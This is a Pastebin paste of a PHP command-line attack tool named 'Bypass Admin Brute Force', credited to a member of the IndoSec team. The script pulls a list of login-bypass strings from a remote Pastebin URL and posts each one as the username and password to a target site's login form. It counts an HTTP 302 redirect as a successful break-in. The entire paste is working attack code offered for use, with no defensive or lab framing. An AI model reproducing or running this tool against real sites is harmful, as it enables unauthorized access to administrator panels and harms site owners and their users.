ToKeiChun

Bypass Admin Brute Force

Sep 6th, 2020
362
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.13 KB | None | 0 0
  1. <?php
  2. $banner = "\e[36;1m
  3.  
  4. # ######
  5. # #
  6. ###### # # ##########
  7. # # # #
  8. ####### ##
  9. ########## # ##
  10. # ##
  11.  
  12.  
  13. [#] Bypass Admin Bruteforce [#]
  14.  
  15. Coded by : Revan AR
  16. Team : IndoSec
  17. Github : https//github.com/revan-ar/\n\n\e[0;1m";
  18. echo $banner;
  19. sleep(2);
  20. echo ">>> URL POST : ";
  21. $url = trim(fgets(STDIN));
  22. sleep(2);
  23. echo ">>> FORM USER NAME : ";
  24. $username = trim(fgets(STDIN));
  25. sleep(2);
  26. echo ">>> FORM PASSWORD NAME : ";
  27. $password = trim(fgets(STDIN));
  28. sleep(2);
  29. echo ">>> BUTTON SUBMIT NAME : ";
  30. $submit = trim(fgets(STDIN));
  31. $list = file_get_contents("https://pastebin.com/raw/78eq3EYn");
  32. $bypass = explode("\r\n", $list);
  33.  
  34. // $x = curl_init();
  35. // curl_setopt($x, CURLOPT_URL, "$url");
  36. // curl_setopt($x, CURLOPT_RETURNTRANSFER, 1);
  37. // curl_setopt($x, CURLOPT_HEADER, 1);
  38. // curl_setopt($x, CURLOPT_POST, 1);
  39. // curl_setopt($x, CURLOPT_POSTFIELDS, "$username=admiinn&$password=admiinn&$submit=1");
  40. // $y = curl_exec($x);
  41. // curl_exec($x);
  42.  
  43. echo "\nRESULT :\n\n";
  44. foreach ($bypass as $query) {
  45.  
  46. $ch = curl_init();
  47. curl_setopt($ch, CURLOPT_URL, "$url");
  48. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  49. curl_setopt($ch, CURLOPT_HEADER, 1);
  50. curl_setopt($ch, CURLOPT_POST, 1);
  51. curl_setopt($ch, CURLOPT_POSTFIELDS, "$username=$query&$password=$query&$submit=1");
  52. $asu = curl_exec($ch);
  53. curl_close($ch);
  54.  
  55. preg_match("/HTTP\/1.1 302/i", $asu, $red);
  56.  
  57. if (!empty($red)){
  58. echo "{#} $query => BERHASIL\n";
  59. sleep(1);
  60. }else{
  61. echo "{-} $query => GAGAL\n";
  62. sleep(1);
  63. }
  64.  
  65. }
  66. ?>
  67.  
Add Comment
Please, Sign In to add comment